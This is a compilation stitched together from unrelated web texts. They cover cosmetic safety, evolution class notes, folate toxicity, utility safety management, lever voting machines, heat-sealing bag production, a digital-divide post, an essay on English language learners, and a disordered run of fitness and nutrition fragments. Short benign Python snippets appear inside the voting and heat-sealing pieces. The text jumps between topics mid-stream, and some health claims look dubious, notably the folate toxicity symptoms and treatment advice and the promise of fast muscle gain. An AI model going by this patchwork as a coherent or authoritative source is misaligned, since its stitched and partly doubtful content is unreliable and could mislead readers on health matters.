However, current evidence suggests that these particles are non-toxic, do not penetrate into or through normal or compromised human skin and, therefore, pose no risk to human health. The increasing use of natural plant ingredients in personal care products raised new safety issues that require novel approaches to their safety evaluation similar to those of plant-derived food ingredients. For example, the Threshold of Toxicological Concern (TTC) is a promising tool to assess the safety of substances present at trace levels as well as minor ingredients of plant-derived substances. The potential human systemic exposure to PCP ingredients is increasingly estimated on the basis of in vitro skin penetration data. However, new evidence suggests that the in vitro test may overestimate human systemic exposure to PCP ingredients due to the absence of metabolism in cadaver skin or misclassification of skin residues that, in vivo, remain in the stratum corneum or hair follicle openings, i.e. outside the living skin. Overall, today's safety assessment of PCP and their ingredients is not only based on science, but also on their respective regulatory status as well as other issues, such as the ethics of animal testing. Nevertheless, the record shows that today's PCP are safe and offer multiple benefits to quality of life and health of the consumer. In the interest of all stakeholders, consumers, regulatory bodies and producers, there is an urgent need for an international harmonization on the status and safety requirements of these products and their ingredients.
MECHANISMS FOR EVOLUTION. Honors Biology. REVIEW: Evidence for Evolution and Examples; What is Natural Selection?; How did Darwin develop the theory of Natural Selection? PATTERNS OF EVOLUTION: Coevolution, in which two or more species evolve in association with one another.
MECHANISMS FOR EVOLUTION
Honors Biology

REVIEW
• Evidence for Evolution and Examples
• What is Natural Selection?
• How did Darwin develop the theory of Natural Selection?

PATTERNS OF EVOLUTION
• Coevolution: 2 or more species evolve in association with one another
 • Predators and Prey
 • Plants and Pollinators
 • Bats and Flowers
• Convergent Evolution: organisms that look similar but are not related
 • Analogous features
 • Similar environments
 • Sharks and Dolphins
• Divergent Evolution: 2 or more related populations or species become more and more dissimilar
 • Usually a response to a new habitat
 • Can result in new species
 • Adaptive radiation
 • Artificial breeding
 • Humans and Chimps

POPULATION GENETICS AND EVOLUTION
• What did Darwin know?
 • Environment is important
 • Competition for resources
 • Natural Selection: individuals with traits more suitable for a particular environment are more likely to survive AND reproduce
• What did Darwin not know?
 • Where does variation come from?

POPULATION GENETICS
• We now know that variation comes from genetics; no variation → extinction
• Population genetics: study of evolution from a genetic point of view

WHAT CAUSES VARIATION
• Need to think about variation in GENOTYPE
• Mutation: change in DNA/chromosomes
• Recombination: during meiosis
• Random fusion of gametes

OTHER MECHANISMS FOR EVOLUTION
• Things that upset genetic equilibrium
• Using Hardy-Weinberg you can predict genotypes; only in hypothetical populations

MUTATION
• Change in DNA or chromosomes
• Makes new alleles for a trait
• Many are harmful
• Can be neutral (code for same amino acid)
• Some are beneficial

MIGRATION/GENE FLOW
• Call it gene flow
• Populations exchange genes
• Increases within-group variation
• Decreases between-group variation
• DOESN'T HAVE TO BE MIGRATION

GENETIC DRIFT
• Occurs in small populations
• Allele frequencies shift as a result of RANDOM events
• Coin toss
• Founder effect; bottleneck

NONRANDOM MATING
• Sexual selection
• Positive assortative mating: mate with someone similar
• Negative assortative mating: redheads!

NATURAL SELECTION
• Darwin and neo-Darwinians believe it is the most important way evolution occurs
• Types of selection

STABILIZING SELECTION
• Average forms are selected for
• Lizards: predators caught slow small and large visible lizards; selects for medium size

DIRECTIONAL SELECTION
• Individuals with an extreme trait are selected for
• Anteaters with long tongues

DISRUPTIVE SELECTION
• Individuals with either extreme are selected for
• Limpet shell color: light and dark on different surfaces

SEXUAL SELECTION
• Choosing mates based on traits
• Intersexual selection
• Intrasexual selection
• Bird color

SPECIATION
• If enough changes accumulate → new species
• Biological concept of species: organisms that can mate and produce fertile offspring; not just morphological (what they look like)
• Isolating mechanisms → speciation
 • Geographic isolation
 • Reproductive isolation
• Rates of speciation
 • Gradualism: species evolve gradually over time
 • Punctuated equilibrium: species go through times of fast change and slow or no change
Folate, folic acid and folacin are terms for the B-complex vitamin known for its vital role in pregnancy. This vitamin is important for avoiding pregnancy defects such as malformation of the neural tube; spinal problems and serious brain damage can result from a malformed neural tube. The vitamin has three components, namely:

- PABA
- Glutamic acid
- Pteridine

Before taking folate, patients should consult a physician so that the tolerable upper intake level of folate can be determined properly. Folate intake should not exceed the recommended dosage. Studies have shown that folate doses greater than 1,000-2,000 µg could cause folate toxicity. Excessive intake of folic acid has no known health benefits.
Folate Poisoning Symptoms
Folate toxicity is not common: since folic acid is water-soluble, it is easily excreted through urination. An overdose of folic acid gives a person mostly the same symptoms as a deficiency of it. Symptoms of folate toxicity include:

- Nervous system disorders
- Gastrointestinal problems such as diarrhea
- Abdominal problems
- Irritability
- Sleep problems such as insomnia
- Fatigue
- Malaise
- Skin reactions
- Seizures
- Reduced effectiveness of the anticancer drug methotrexate, anticonvulsant drugs, barbiturates, estrogen, zinc, sulfasalazine and antimalarial treatments
- Impaired absorption of vitamin B12
It is best to prevent folate side effects, because the signs and symptoms they cause may require medications that could be harmful to the pregnant mother and the fetus. Avoid excessive intake of folic acid by knowing the required daily intake, and consult a physician or an ob-gyn before taking folate supplements. Some physicians also suggest that instead of taking supplements, patients should simply eat folate-rich foods such as beans, bananas, soy, peanuts, oranges, fish, turkey, beef, crab and eggs.
Treatment for Folate Toxicity
Treatment for folate toxicity depends on which symptoms the person has. For example:

- If the person is suffering from insomnia due to folate toxicity, he or she will be given medication to help sleep.
- If the person has diarrhea, he or she will take a medication for diarrhea.
- In case of folic acid poisoning during pregnancy, one must see a doctor immediately so that the symptoms can be treated in a way that neither the baby nor the mother is harmed by the medication.
Improve Safety Performance Using Exemplary Human Performance System
The choices people make affect the safety of employees, customers and the public. If utility employees choose to be safe and competent, they will accomplish their work with zero injuries and safety incidents.
By Carl English and Doug Mead
Achieving exemplary safety performance takes more than a goal or a well-formulated strategy with good implementation processes. It comes down to whether utility executives and their teams choose to perform their respective safety leadership responsibilities to predetermined performance standards. Two things are critical to ensuring safety: accurate safety reporting data and identifying which responsibilities matter most for each role involved.
Safety Best Practices Background
Safety needs to be a priority for everyone to achieve any safety goal. The most important goal of each workday is to return home safely to family and friends each night. While safety is often our main concern, safety performance hasn't always kept pace throughout the utility industry. Exemplary performing organizations have identified a need to focus on safety fundamentals, and that focus has helped them reclaim their tradition as among the safest organizations in the nation.
Safety Responsibilities
Executives at exemplary performing utilities know that simply reacting to accidents isn't enough. One well-formulated strategy is to focus on prevention, which includes a renewed emphasis on clarifying safety roles and responsibilities. It is critical to help executives, managers, directors, field leaders, crew leaders and other employees identify the responsibilities they need to fulfill to be more effective. Leaders need to learn how to communicate with the people they work for and serve, set clear expectations, coach their teams and resolve conflicts. In some exemplary organizations, safety responsibility process maps have been created to educate employees about safety roles. Safety process maps define each work group's safety roles and should be posted companywide. Achieving exemplary safety performance depends almost entirely on ensuring that everyone in every role chooses to fulfill safety leadership responsibilities effectively and efficiently. Union and management leadership needs to identify safety leadership roles and responsibilities: outputs, tasks and performance standards. Through this, executives can ensure employees are chosen to fulfill responsibilities for the good of the organization; ensure each safety leadership role and its responsibilities are clear; and ensure outputs, tasks and performance standards are integrated into job descriptions and job profiles.
The Organizational Whole is the Sum of its Parts
To achieve exemplary safety performance, utility executives need to understand that safety performance is a result of an effective human performance system. Think of a human performance system as a group of interacting, interrelated or interdependent components forming a complex organizational whole. The human safety system components involved in this process include:
• Creating a shared team schedule with a clear safety human performance system implementation, performance monitoring deadlines and regular updates;
• Monitoring and reporting quantitative and qualitative indicators of success and lack of success;
• Providing frequent safety performance feedback throughout the organization;
• Providing appropriate positive and corrective consequences; and
• Celebrating success with all employees.
The Use of Analytics
Use analytics to discover and communicate meaningful patterns in safety data.
• Determine if your safety reporting data is accurate and being interpreted correctly.
• Ensure employees fill out safety reporting information, including codes for the different types of safety incidents, and differentiate between near misses and actual accidents.
• Identify safety performance trends. What are the most common types of safety incidents? What are the root causes?
Based on the analytic data, establish meaningful and specific safety performance goals. Share safety leadership lessons from the most accomplished safety leaders from within the system throughout the organization. Be sure company leadership creates a safety partnership with union executives. Assigning a senior executive as the safety process owner will help ensure the progress. Use the communications department's processes to communicate messages and share lessons learned from safety data.
Safety Training
Provide safety training that includes clarity about each role's outputs, tasks and performance standards. Create, distribute and prominently display a safety system process map to identify, clarify and communicate each component leader's safety roles and responsibilities.
Utilities that are distinguished by being exemplary have established clear safety roles for executives, managers and directors, supervisors, crew leaders and lead employees, and team members. Employees are responsible and held accountable for carrying out his or her safety responsibilities. An organization can only achieve exemplary safety performance if everyone chooses to fulfill shared responsibilities.
Follow the example of exemplary safe organizations and apply a human performance system to help ensure safety to the public and customers by providing safe and competent employees, each and every day.
About the authors: Carl English is a board member for Utility Supply and Construction Co., and former vice chairman and chief operating officer for American Electric Power. Doug Mead is principal consultant with Exemplary Performance, a human performance improvement company based in Annapolis, Md. Mead brings more than 30 years of experience in the utility industry.
Tired of electronic voting machines and all of the new problems they've created?
Take a nostalgic trip back to 1974 as Mr. Rogers demonstrates how to cast a ballot on a 30-year-old mechanical lever voting machine and experiences a little glitch.
Mr. Rogers, for all of our international readers who may not know him, was a popular children's TV show host, whose program ran for nearly four decades.
Lever machines were first used in 1892 and are still used in New York, despite a state law banning them and a 2002 federal law urging states to replace lever and punch-card machines with new voting systems and requiring them to install at least one accessible voting machine in each precinct for disabled voters by 2006. The Department of Justice sued the state for failing to meet deadlines established by the Help America Vote Act for having accessible machines in place. Although many states have replaced their old machines, New York has failed to do so and has experienced numerous obstacles such as partisan squabbles among state officials, disorganization and problems trying to find a voting system that works.
The behemoth machine that Mr. Rogers demonstrates in the video resembles a switchboard with dozens of metal levers, each marked with a candidate's name or ballot-issue choice. To make a selection, a voter pulls down the lever. When the voter is finished, he pushes a button, which causes each lever to return to its place. Here's a description of what happens next:
As each lever returns, it causes a connected counter wheel within the machine to turn one-tenth of a full rotation. The counter wheel, serving as the "ones" position of the numerical count for the associated lever, drives a "tens" counter one-tenth of a rotation for each of its full rotations. The "tens" counter similarly drives a "hundreds" counter. If all mechanical connections are fully operational during the voting period, and the counters are initially set to zero, the position of each counter at the close of the polls indicates the number of votes cast on the lever that drives it. Interlocks in the machine prevent the voter from voting for more choices than permitted.
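The carry mechanism described in the quote works like a mechanical odometer: a full rotation of one counter wheel advances the next wheel by one digit. A minimal simulation (purely illustrative; the class and method names are invented, not part of any real machine specification) might look like:

```python
# Toy simulation of a lever machine's three-wheel counter.
# Each wheel holds a digit 0-9; when a wheel rolls over from
# 9 to 0, the next wheel advances by one (the "carry").

class LeverCounter:
    def __init__(self):
        self.wheels = [0, 0, 0]  # ones, tens, hundreds

    def pull_lever(self):
        """Record one vote, carrying into higher wheels as needed."""
        for i in range(len(self.wheels)):
            self.wheels[i] = (self.wheels[i] + 1) % 10
            if self.wheels[i] != 0:
                break  # this wheel did not roll over, so no carry

    def total(self):
        """Read the count off the wheels, as poll workers would."""
        return self.wheels[0] + 10 * self.wheels[1] + 100 * self.wheels[2]

counter = LeverCounter()
for _ in range(123):
    counter.pull_lever()
print(counter.total())  # 123
```

As with the real hardware, the counters start at zero and simply accumulate pulls; a three-wheel counter wraps around after 999 votes.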
[Correction: This post was corrected to indicate that HAVA did not require states to replace punch-card and lever machines but simply urged states to do so by offering federal funding to purchase new machines. It was a New York state law that banned the machines. But a lawsuit challenging the constitutionality of that law is in the works.]
Contact us Add: Mo Wu Industrial Zone, Wanjiang District, Dongguan City, Guangdong Tel: 86-0769-85720597 85720598 38861128 (10 lines) Fax: 86-0769-85720596 Email: [email protected]
The three elements of heat sealing bag making
Traditionally, heat-sealing temperature, heat-sealing time and heat-sealing pressure are called the three elements of heat-seal bag making.

1. Heat-sealing temperature

The role of heat-sealing temperature is to heat the sealant layer to an ideal viscous-flow state. A polymer does not have a single melting point but a melting temperature range; that is, there is a temperature region between the solid and liquid phases, and when heated into that region the film enters the molten state. The polymer's viscous-flow temperature and decomposition temperature are the lower and upper limits for heat sealing, and the size of the difference between them is an important measure of how difficult a material is to heat-seal. The heat-sealing temperature is set according to the characteristics of the sealant material, the film thickness, the number of sealing passes, the sealing pressure and the size of the sealing area. If the pressure applied to the same part is increased, the temperature can be reduced accordingly; if the sealing area is large, the temperature can be slightly higher. In the heat sealing of composite bags, temperature has the most direct influence on seal strength: the melting temperatures of the various materials directly determine the minimum heat-sealing temperature of the bag. In actual production, the effective sealing temperature is affected by sealing pressure, bag-making machine speed and substrate thickness, so the set temperature tends to be higher than the melting temperature of the sealant material. If the heat-sealing temperature is below the softening point of the sealant, no amount of added pressure or extended sealing time will produce a real seal.

In general, seal strength increases with heat-sealing temperature, but above a certain temperature the strength stops increasing (see Figure 1 for the relationship between seal strength and temperature). If the temperature is too high, the sealant at the weld is easily damaged and molten material is squeezed out of the seam, greatly reducing the seal strength and the impact resistance of the bag.

2. Heat-sealing time

Heat-sealing time is the duration the film spends under the heated jaw; it is also a key factor affecting seal strength and appearance. At the same temperature and pressure, a longer sealing time lets the sealant layers fuse more fully and bond more strongly. But if the sealing time is too long, the seal seam is prone to wrinkling and deformation, affecting flatness and appearance; an overly long sealing time can also decompose the polymer and degrade the sealing performance of the seal interface. In general, heat-sealing time is determined mainly by the speed of the bag-making machine. On older machines, the sealing time can only be adjusted by changing the machine speed, so extending the sealing time sacrifices production efficiency. In recent years, bag-machine manufacturers at home and abroad have used independently controlled variable-frequency motors to drive the sealing knife and the feed, allowing the sealing time to be adjusted without changing the bag-making speed, or the speed to be adjusted while holding the sealing time constant. This greatly eases operation and quality control and improves production efficiency.

3. Heat-sealing pressure

The function of heat-sealing pressure is to make the polymer resin, already in a viscous-flow state, penetrate and diffuse effectively across the sealing interface at the molecular level, achieving the sealing effect. Appropriate pressure is necessary to reach the ideal seal strength. For ordinary thin-film medical packaging, the heat-sealing pressure should be at least 20 N/cm², and as the total thickness of the composite film or the seal width increases, the required pressure should increase accordingly. If the sealing pressure is insufficient, it is difficult for the sealant layers of the two films to truly join and fuse, leading to local sealing failure, or the air trapped in the sealant layer cannot be expelled, resulting in weak or uneven seals. If the pressure is too high, molten material is squeezed out of the seal, the weld edge approaches a half-cut-off state, and the weld becomes brittle, reducing the seal strength. In general, the strength loss at the sealed area after sealing should not exceed about 10%. Changing the pressure changes the heat-sealing behavior: the greater the pressure, the shorter the required sealing time or the lower the required temperature, but the usable heat-sealing window also narrows. In practice, the pressure can be adjusted to run at higher temperatures and increase output by shortening the sealing time, but this is difficult to control and must be done carefully to avoid negative effects.

Composite film materials themselves

Besides the three process elements above, which strongly influence bag quality, the properties of the composite material itself are among the most important factors directly affecting the operating parameters of the heat-seal bag-making equipment.
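As a rough illustration of the parameter windows described above (a real seal forms only between the sealant's viscous-flow and decomposition temperatures, and thin-film packaging needs at least about 20 N/cm² of pressure), one could sketch a settings check. The function name, structure and example numbers below are hypothetical, not taken from any equipment manual:

```python
# Hedged sketch: validate proposed heat-sealing settings against
# the windows described in the text. Temperatures in deg C,
# pressure in N/cm^2; all numeric inputs are illustrative.

def check_seal_params(temp, pressure, viscous_flow_temp,
                      decomposition_temp, min_pressure=20.0):
    """Return a list of problems with the proposed settings."""
    problems = []
    if temp < viscous_flow_temp:
        problems.append("temperature below viscous-flow range: no real seal")
    if temp >= decomposition_temp:
        problems.append("temperature at/above decomposition: material damage")
    if pressure < min_pressure:
        problems.append("pressure too low: incomplete fusion, trapped air")
    return problems

# Example: assumed sealing window 120-180 deg C, 25 N/cm^2 applied
print(check_seal_params(150, 25, 120, 180))  # [] -> settings acceptable
```

An empty list means the settings fall inside the assumed window; in practice the window also shifts with film thickness, machine speed and seal area, as the text notes.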
Dongguan RUIZHE Packing Products Co., Ltd., founded in 1998, specializes in the production of soft plastic products: PVC (materials can pass testing standards such as EN-71, RoHS, and REACH 15P/6P), TPU, OPP composite bags, etc. Welcome to inquire.
Dear Commons Community,
The New York Times has an article today on a new digital divide based on how young people use media and online technology. Citing a number of sources, the article comments:
“As access to devices has spread, children in poorer families are spending considerably more time than children from more well-off families using their television and gadgets to watch shows and videos, play games and connect on social networking sites, studies show.
This growing time-wasting gap, policy makers and researchers say, is more a reflection of the ability of parents to monitor and limit how children use technology than of access to it…
“access is not a panacea,” said Danah Boyd, a senior researcher at Microsoft. “Not only does it not solve problems, it mirrors and magnifies existing problems we’ve been ignoring.”
The article cites a study published by the Kaiser Family Foundation that found that children and teenagers whose parents do not have a college degree spent 90 minutes more per day exposed to media than children from higher socioeconomic families. In 1999, the difference was just 16 minutes. Specifically, the study found that children of parents who do not have a college degree spend 11.5 hours each day exposed to media from a variety of sources, including television, computers and other gadgets. That is an increase of 4 hours and 40 minutes per day since 1999.
Children of more educated parents, generally understood as a proxy for higher socioeconomic status, also largely use their devices for entertainment. In families in which a parent has a college education or an advanced degree, Kaiser found, children use 10 hours of multimedia a day, a 3.5-hour jump since 1999. (Kaiser double counts time spent multitasking. If a child spends an hour simultaneously watching TV and surfing the Internet, the researchers counted two hours.)
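Kaiser's double-counting convention amounts to summing time spent on each medium rather than wall-clock time, so overlapping use is counted once per medium. A toy illustration, with invented numbers:

```python
# Toy illustration of Kaiser's multitasking convention: total
# media exposure is the sum of time on each medium, so an hour
# of simultaneous TV + internet counts as two hours. The session
# data below is made up for the example.

sessions = [
    {"medium": "tv", "hours": 1.0},
    {"medium": "internet", "hours": 1.0},  # same wall-clock hour as the TV
    {"medium": "games", "hours": 0.5},
]

exposure = sum(s["hours"] for s in sessions)
print(exposure)  # 2.5 media-hours from at most 1.5 wall-clock hours
```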
“Despite the educational potential of computers, the reality is that their use for education or meaningful content creation is minuscule compared to their use for pure entertainment,” said Vicky Rideout, author of the decade-long Kaiser study. “Instead of closing the achievement gap, they’re widening the time-wasting gap.”
Tony
Professional Content Review Essay Example

Sheltered Instruction Observation Protocol and the Use of Scaffolding in English and Mathematics. Students whose primary language is not English often find it difficult to succeed in American classrooms. Various barriers, such as cultural differences, proficiency in subject matter in their native language, and whether the student speaks English or their native language at home, affect their ability to learn core subject matter. English Language Learners (ELLs) may be fluent in conversational English, but most likely do not have a grasp of academic English. According to the American Educational Research Association (2004, as quoted in Freeman & Crawford, 2008), academic English is "the ability to read, write, and engage in substantive conversations about math, science, history, and other school subjects." The inability to communicate academic ideas is one reason for the high dropout rates of ELLs in schools across the country. In response to the unique challenges faced by ELL students in mainstream classrooms, the Center for Research on Education, Diversity, and Excellence developed a tool, the Sheltered Instruction Observation Protocol (SIOP). Sheltered instruction is delivered in English, but the teacher uses a number of instructional techniques to modify the delivery of the curricula so that all students can meet the objectives upon completion of the chapter, unit, or course.
Freeman & Crawford (2008) highlight eight components that encompass the variety of strategies used by SIOP teachers: increase comprehensibility, scaffold, target language development, develop student background knowledge, make connections to students' lives and concerns, promote student-to-student interaction, promote higher-order thinking skills, and review and assess. This paper will focus on the use of scaffolding in English and math classrooms.
Anyone who has ever learned a second language knows how difficult it can be to apply the words and sentences learned in the classroom to real-world settings. In her article "Shared Responsibility: Achieving Success with English-Language Learners," Betsy Lewis-Moreno highlights this idea while discussing education in San Antonio, Texas. She criticizes the placement of ELLs in remedial classes and urges teachers to help students learn from their mistakes rather than punish them for trying to express concepts that are new to them. No matter how gifted in his or her native language, the ELL student can be expected to make errors when speaking or writing academic English. Lewis-Moreno suggests using scaffolding to give feedback and constructive criticism so that the student "develops the knowledge and confidence to grow as a learner" (2007). Without such feedback, she suggests, students will not progress in their learning and will continue to lag behind their peers in academic achievement.

It is fairly simple to incorporate scaffolding into the English/Language Arts classroom. As noted before, students may be quite adept at core subjects in their native language. They may also have completed a good portion of their education before moving to the United States and entering American classrooms. It is the teacher's responsibility to discover the ELL's level of expertise, then help the learner express that knowledge in English. One example Lewis-Moreno offers is to give students partially completed graphic organizers.

In this manner, more advanced students would have more blank spaces to fill in themselves as they progress through the lesson, while others may be given more completed organizers, perhaps with side-by-side explanations in English and their native language. This allows students to be in the appropriate classroom for their age and understanding, making them more comfortable expressing themselves and participating in class, and improving self-esteem. As the student grows in his or her ability to learn in English, the scaffolding process allows the teacher to gradually increase the amount of work required of the student until, optimally, the student is able to read the lesson and complete the homework independently.

Barbara Freeman and Lindy Crawford discuss the use of scaffolding in mathematics classes in their article "Creating a Middle School Mathematics Curriculum for English-Language Learners" (2008). They cite the growing number of ELLs and a shortage of ELL-trained teachers as the rationale for implementing SIOP, particularly scaffolding, to help students overcome the difficulties that are unique to learning math in English. The article details how technology can greatly enhance students' ability to learn and focuses specifically on a relatively new web-based program called Help with English Language Proficiency (HELP) Math. Although designed to meet the needs of Spanish-speaking ELLs by providing side-by-side language support in Spanish, this feature can be turned off, and the program is appropriate for any student. In addition to learning English, math students must also learn what the authors call "the language of mathematics." This includes complex new terms such as hypotenuse; familiar words that have a different meaning in math than in other courses, such as chance or product; and symbols that may differ between English-language math and the students' native math. For example, in Spanish large numbers are separated by periods, but in English commas are used (10.000 vs. 10,000). For these reasons, "to learn mathematics, a student must be able to read, solve problems, and communicate using technical language in a specialized context" (Freeman & Crawford, 2008).

In 2002, the educational software company Digital Directions International (DDI) developed HELP Math. Using interactive multimedia, HELP Math is scaffolded to support ELLs and assist them in navigating this demanding subject. Students can work through the material at their own pace, and several tools are available to them if they encounter difficulty at any point in the lesson. These range from a "Need More Help" button to hyperlinks that offer vocabulary support, as well as the option to hear or see the instruction in their native language (currently limited to Spanish) and then apply it to the English text. By providing additional help as the student needs it, the program scaffolds the learning to help the student reach a level of understanding that he or she might not be able to attain alone. This challenges the student, and according to exit interviews from beta tests, students felt "less stupid," "less lost," and "more prepared to figure out what the teacher was saying" (Freeman & Crawford, 2008). Teachers also felt that HELP Math actively contributed to the classroom and the overall learning process.

These two articles demonstrate how the SIOP concept of scaffolding can be used in a variety of American classrooms. Besides developing the academic English skills necessary for Language Arts and Social Studies, learning can be enhanced in sub-languages like that of mathematics. Even students who were raised in America and go through their entire K-12 experience in English express anxiety over math and science because the concepts can be daunting. Imagine how much more difficult those subjects are for students who not only lack a firm grasp of the English language but also have to learn technical and confusing terms on top of it. With proper lesson planning and a little effort, incorporating scaffolding into a lesson should be relatively easy. This tool was designed to help teachers help students and should not be viewed as a burden or a demand that teachers change their lesson plans. Using SIOP concepts in the classroom reduces many of the frustrations that both teachers and students experience in specialized learning environments, and as the concept becomes more widely adopted across America's schools, ELLs will become contributing, functional members of society rather than dropout statistics.
(10) Exercising - you talk about building muscle - this comes from breaking down the muscle and building it back up with protein. A surplus is not needed for muscle growth, protein is. I always say stick with 100g minimum so you’re consistent. 100g is 400 calories. Muscles need glucose to perform, so I would eat enough carbs to fill your glycogen levels to prepare for your next training. Then eat fats to cover the rest of the calories whether it’s a surplus or deficit. You can build muscle and lose weight in the same day, just not at the same time (I’ll explain in point 10). Building muscle = breaking down the muscle and rebuilding it with protein. Losing weight = a deficit. Tell me why this can’t happen? Some fear muscle loss during deficits. No. Eat protein. Eat a little more. Some think surpluses are needed to build muscle. No. A surplus leads to fat gain. Even if the excess calories come from protein. Everything has a number. Figure out what fits for you. This is why point 9 is important.
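The split described above (a fixed protein floor of about 100 g, which is roughly 400 kcal, carbs to refill glycogen, and fats covering whatever calories remain) can be sketched as a quick calculator. The function name and the default carb target below are illustrative placeholders, not a recommendation:

```python
# Hedged sketch of the macro split described in the post:
# fixed protein, a chosen carb target for glycogen, fats fill
# the remaining calories. Defaults are placeholders, not advice.

def macro_split(total_kcal, protein_g=100, carb_g=150):
    """Split a daily calorie budget into protein, carbs and fat."""
    protein_kcal = protein_g * 4  # 4 kcal per gram of protein
    carb_kcal = carb_g * 4        # 4 kcal per gram of carbohydrate
    fat_kcal = total_kcal - protein_kcal - carb_kcal
    if fat_kcal < 0:
        raise ValueError("total_kcal too low for these protein/carb targets")
    return {"protein_g": protein_g, "carb_g": carb_g,
            "fat_g": round(fat_kcal / 9)}  # 9 kcal per gram of fat

print(macro_split(2000))  # fats absorb the remaining 1000 kcal
```

The same function works for a surplus or a deficit: only `total_kcal` changes, while the protein floor stays constant, which is the post's point about holding protein steady while adjusting overall calories.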
It's a lofty goal: Gain 10 pounds of muscle in just one month. While such results are aggressive and can't continue at the same torrid rate indefinitely, we've seen firsthand individuals who've followed our mass-gaining programs and reached double digits in four short weeks, averaging gains of 2-3 pounds a week. Trust us, it can be done. But if there's one thing such a bold goal needs, it's an ambitious training and nutrition strategy. In regard to nutrition, don't even think about taking that aspect lightly. You can work out all you want, but if you don't ingest adequate calories and macronutrients, you won't build muscle. What and when you eat is paramount to your results, and you'll find all you need to know about gaining mass in a short amount of time in our bulking diet meal plan.

How do I know if my weights are heavy enough? Check your form. This workout involves many repetitions of the same exercise, and you will know you are using the correct weight if your form stays consistent between the first part of a repetition set and the end. For example, a row from plank should look the same on repetition number 10 as it does on repetition number two, even if the effort is much greater. If your form is wobbly by the end, drop down the weight until you're able to find consistency. Don't forget that working with weights is not an all-or-nothing proposition. Your body also provides resistance. Try our 9-Minute Strength Workout for a weight-free option.

A: Start with the calculations above, but don't be afraid to adjust up or down. Your metabolism and physiology will adapt to more food by trying to maintain homeostasis and regulate your bodyweight. Some may have to increase more than others, but the number on the scale doesn't lie. If it's not going up, then you probably need to increase your calories.

Unfortunately, some people are intolerant to milk due to casein (one of the proteins in dairy) or have trouble digesting the sugar in milk, called lactose. If this is the case, stick to whey-only protein shakes. Maximuscle uses Biomax Whey True Protein - a unique blend of whey proteins including whey protein concentrate, isolate and hydrolysate, which are lower in lactose. Biomax Whey True Protein is used in a number of Maximuscle products (Promax and Cyclone).

Secure a flat resistance band just above your ankles and stand with your feet at about hip width, keeping feet forward. Keeping your weight in your heels, step your right foot laterally, maintaining the tension in the band. Keep the band taut as you step your left foot slightly to the right. Continue stepping sideways to your right for about 5 steps. Then step to your left to return to the starting position. Repeat three times.

In other primates, gluteus maximus consists of ischiofemoralis, a small muscle that corresponds to the human gluteus maximus and originates from the ilium and the sacroiliac ligament, and gluteus maximus proprius, a large muscle that extends from the ischial tuberosity to a relatively more distant insertion on the femur. In adapting to bipedal gait, reorganization of the attachment of the muscle as well as the moment arm was required.[4]
Work on strengthening all of your core muscles and glutes. These muscles work together to give you balance and stability and to help you move through the activities involved in daily living, as well as exercise and sports. When one set of these muscles is weak or tight, it can cause injury or pain in another, so make sure you pay equal attention to all of them.
This is how the NPC differs from the NANBF. The NANBF takes a more direct approach by taking urine samples from all competitors, which are tested for steroids and any other substances on the banned list. The NANBF also differs from the NPC when it comes to judging. The criteria for certain poses differ from organization to organization. The NANBF even has an elevated calf pose, which is unique to their competitions.[citation needed]

A: Let your symptoms be your guide. A slight sore throat or runny nose may require you to back off for a day or two, but don't confine yourself to your bed and assume the worst. However, you must also remember that prolonged, intense exercise can decrease immune function and make you more susceptible to bacterial and viral illness, so it's equally important to listen to your body and respond accordingly.

You don't need to design a fresh plan every three weeks. Scaling up weight and modifying reps are obviously both important for progression, but playing with different set styles will shock your body and keep things interesting. Remember, bodybuilding isn't meant to feel like a chore. Below, we explain eight different types of sets to help you build muscle more efficiently during bodybuilding training.

Don't take sets to the point of failure - where you absolutely can't perform another rep. You should never get to where you're turning purple and screaming like you're getting interviewed by "Mean" Gene Okerlund before WrestleMania. Most of the time, you want to end your sets two reps before total failure. Not sure when that is? The moment your form breaks down, or you're pretty sure it's going to break down, end the set.

The gluteus medius muscle originates on the outer surface of the ilium between the iliac crest and the posterior gluteal line above and the anterior gluteal line below; the gluteus medius also originates from the gluteal aponeurosis that covers its outer surface. The fibers of the muscle converge into a strong flattened tendon that inserts on the lateral surface of the greater trochanter. More specifically, the muscle's tendon inserts into an oblique ridge that runs downward and forward on the lateral surface of the greater trochanter.

Achy knees are often written off as an inevitable side effect of getting older. And while it's true knee pain has many age-related causes (namely, arthritis), chances are weak glutes are a big part of the problem, Kline says. If you've been diagnosed with arthritis, strengthening your glutes can at least help offset some of the pain you might experience, she says.

(1) Water - I drink this all the time, mainly in the morning. Doesn't it make sense to hydrate upon waking up? I used to get nauseous, but that was because of poor food choices. Now it's like a filtering fluid at this time of day. I drink it all day, about 1 water bottle every hour. It's easy to remember and to do (well, for me). We should aim for around 100 oz of water, and consuming all of it at one time would suck. So "timing" water (which is a nutrient) is considered "nutrient timing".

(3) Fats make you fat - yes, dietary fats get stored as fat; that is where they go. Fat from a meal that isn't used for energy will be stored. But that doesn't mean fats make you fat. The only way fats can make one "fat" is if the fat stored from meals stays stored - otherwise known as a calorie surplus. In a surplus, there is no time for fat to be used for energy. In a deficit, fat will be used because you "aren't eating enough". So yes, fats get stored as fat, but they only make you fat if you keep them stored.

Notice that when we are scared or excited we start to breathe faster. Adrenaline causes this. Which means that to calm ourselves we must not breathe fast; we just breathe slower. The slower we can breathe, the less stressed we will feel. The slower we can breathe, the longer our strokes will be. When we breathe fast, our strokes (breathing in and out) become shortened. When we breathe slower, we can engage the diaphragm in a way that eventually allows us to breathe in longer strokes.
My name is Samtak, and I recently started experimenting with some supplements after about 4-6 months of working out. As of right now I have a protein shake once a day with gainers in the protein powder, and I am trying to figure out how to use beta-alanine and creatine in combination with BCAAs. Can anyone help me figure out a good plan for better effects from these supplements? My current weight is 60 kg and I am 16.
If you tend to stand with a "swayback," developing awareness of the opening at the front of your hips is especially important. In Tadasana (Mountain Pose), practice lifting the ASISes, moving the tailbone down, and lifting the lumbar spine. Putting a belt around your waist, as you did in Warrior I, may help you increase your awareness of your pelvic alignment in this pose too.

The first two weeks of the program are all about lifting heavy with mass-building compound exercises. For everything but abs and calves, reps fall in the 6-8 range; for those accustomed to doing sets of 8-12, this means going heavier than normal. There are very few isolation exercises during this phase for chest, back, shoulders and legs because the emphasis is on moving as much weight as possible to add strength and size.

Stand with your feet slightly wider than shoulder width with a kettlebell about a foot in front of you. With your weight in your heels, hinge at your hips while lowering your hands to the kettlebell handle. Grab the kettlebell with an overhand grip, and "hike" the kettlebell back between your legs, catching the force of the moving kettlebell with your hips. Exhale as you swing the kettlebell forward by thrusting your hips, straightening your legs, and squeezing your glutes and abs. Once the kettlebell reaches chest height, inhale as you allow it to fall, and guide it back to the "hiked" position.
